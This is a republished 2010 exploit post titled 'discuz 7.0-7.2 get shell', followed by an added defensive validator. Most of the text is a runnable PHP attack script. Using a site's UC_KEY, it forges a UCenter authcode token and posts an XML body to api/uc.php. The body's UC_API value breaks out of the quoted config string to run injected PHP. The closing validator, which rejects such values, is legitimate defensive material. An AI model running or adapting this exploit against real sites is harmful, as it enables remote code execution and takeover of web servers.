discuz 7.0-7.2 get shell
Source: http://hi.baidu.com/mr_xhming   Author: xhm1n9   Published: 2010-11-02

#!/usr/bin/php
<?php
print_r('
+-------------------------------------------------------------------------------------------+
2010.2.6
discuz 7.0-7.2 get shell
exploit by xhming
site: http://hi.baidu.com/mr_xhming
+-------------------------------------------------------------------------------------------+
');
if ($argc < 3) {
    print_r('
+-------------------------------------------------------------------------------------------+
usage: php <this script> xxxx.com uc_key
+-------------------------------------------------------------------------------------------+
');
    exit;
}

error_reporting(7);
ini_set('max_execution_time', 0);

$host   = $argv[1];
$uc_key = $argv[2];   // the target's UCenter communication key (UC_KEY)
$k      = time();
// api/uc.php only accepts a request whose "code" parameter decodes, under UC_KEY,
// to a fresh timestamp plus the requested action.
$get  = array('time' => $k, 'action' => 'updateapps');
$code = encode_arr($get, $uc_key);

// The UC_API item carries the injected content.
$cmd = <<<xhming
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">');phpinfo();//</item>
<item id="bb">ffaaa</item>
</root>
xhming;

echo send($cmd);

function send($cmd)
{
    global $host, $code;

    // Adjust the path to wherever api/uc.php lives on the target
    $message  = "POST /dz7.2/api/uc.php?code=$code HTTP/1.1\r\n";
    $message .= "Content-Type: text/xml\r\n";
    $message .= "User-Agent: Apache XML RPC 3.0 (Jakarta Commons httpclient Transport)\r\n";
    $message .= "Host: $host\r\n";
    $message .= "Connection: Close\r\n";   // so the read loop below terminates
    $message .= "Content-Length: " . strlen($cmd) . "\r\n\r\n";
    $message .= $cmd;

    $fp = fsockopen($host, 80, $errno, $errstr, 10);
    if (!$fp) {
        print_r("connect failed: $errstr ($errno)\n");
        exit;
    }
    fputs($fp, $message);

    $resp = '';
    while (!feof($fp)) {
        $resp .= fread($fp, 1024);
    }
    fclose($fp);

    return $resp;
}

// Serialise the parameters as a query string and encrypt them with UCenter's authcode scheme
function encode_arr($get, $uc_key) {
    $tmp = '';
    foreach ($get as $key => $val) {
        $tmp .= '&' . $key . '=' . $val;
    }
    return _authcode($tmp, 'ENCODE', $uc_key);
}

// UCenter's _authcode(): an RC4-style stream cipher keyed from md5($key) and a
// 4-character random prefix; the plaintext is prefixed with a 10-digit expiry and
// a 16-character md5 check so the receiver can verify it.
function _authcode($string, $operation = 'DECODE', $key = '', $expiry = 0) {
    $ckey_length = 4;

    $key  = md5($key ? $key : UC_KEY);
    $keya = md5(substr($key, 0, 16));
    $keyb = md5(substr($key, 16, 16));
    $keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length) : substr(md5(microtime()), -$ckey_length)) : '';

    $cryptkey   = $keya . md5($keya . $keyc);
    $key_length = strlen($cryptkey);

    $string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0) . substr(md5($string . $keyb), 0, 16) . $string;
    $string_length = strlen($string);

    $result = '';
    $box = range(0, 255);

    // Key-scheduling: expand the key to 256 bytes, then permute the S-box
    $rndkey = array();
    for ($i = 0; $i <= 255; $i++) {
        $rndkey[$i] = ord($cryptkey[$i % $key_length]);
    }

    for ($j = $i = 0; $i < 256; $i++) {
        $j = ($j + $box[$i] + $rndkey[$i]) % 256;
        $tmp = $box[$i];
        $box[$i] = $box[$j];
        $box[$j] = $tmp;
    }

    // Keystream generation and XOR with the input
    for ($a = $j = $i = 0; $i < $string_length; $i++) {
        $a = ($a + 1) % 256;
        $j = ($j + $box[$a]) % 256;
        $tmp = $box[$a];
        $box[$a] = $box[$j];
        $box[$j] = $tmp;
        $result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
    }

    if ($operation == 'DECODE') {
        // Accept only if the expiry has not passed and the md5 check matches
        if ((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26) . $keyb), 0, 16)) {
            return substr($result, 26);
        } else {
            return '';
        }
    } else {
        return $keyc . str_replace('=', '', base64_encode($result));
    }
}

?>
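The script above works because the updateapps handler in api/uc.php copies the submitted item values into the site's PHP configuration, so a value that closes the quoted string is executed on the next page load. The following validator is an added defensive example, not code from the original post or from Discuz/UCenter: it rejects an updateapps XML body whose item ids are not bare identifiers or whose values contain characters that could terminate a single-quoted PHP string. It assumes that UCenter stores each value between single quotes in config.inc.php, and the permitted character set (enough for URLs, numbers and identifiers) is an assumption as well; the sample XML is constructed from the payload shape shown above.

```php
<?php
// Added defensive example (not part of the original page or of UCenter).
// Assumption: each <item> value is written between single quotes into
// config.inc.php, so quotes, parentheses, semicolons or newlines in a value
// must never reach the file. Returns a list of problems; empty means accept.
function validate_updateapps_xml(string $xml): array {
    $problems = [];

    // LIBXML_NONET: never fetch external resources while parsing the body
    $prev = libxml_use_internal_errors(true);
    $doc  = simplexml_load_string($xml, 'SimpleXMLElement', LIBXML_NONET);
    libxml_use_internal_errors($prev);
    if ($doc === false) {
        return ['XML body is not well-formed'];
    }

    foreach ($doc->item as $item) {
        $id    = (string) $item['id'];
        $value = (string) $item;

        // Setting names are constants such as UC_API, UC_APPID: letters, digits, underscore
        if (!preg_match('/^[A-Za-z0-9_]+$/', $id)) {
            $problems[] = 'item id is not a bare identifier: ' . var_export($id, true);
            continue;
        }
        // Assumed allow-list for values: URLs, numbers and identifiers only
        if (!preg_match('#^[A-Za-z0-9_.:/\-]*$#', $value)) {
            $problems[] = "item $id contains characters that could escape a quoted config value: "
                        . var_export($value, true);
        }
    }
    return $problems;
}

// Constructed sample: the payload shape from this page plus a benign item.
$sample = <<<XML
<?xml version="1.0" encoding="ISO-8859-1"?>
<root>
<item id="UC_API">');phpinfo();//</item>
<item id="UC_APPID">1</item>
</root>
XML;

$problems = validate_updateapps_xml($sample);
if ($problems) {
    // Refuse the request instead of rewriting config.inc.php
    foreach ($problems as $p) {
        echo "reject: $p\n";
    }
} else {
    echo "ok\n";
}
```

Run against the sample, the validator reports the UC_API item and accepts UC_APPID. This is defence in depth rather than a complete fix: the request is only processed when its code parameter was produced with the site's real UC_KEY, so a key that has been exposed should also be rotated in both UCenter and the application.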
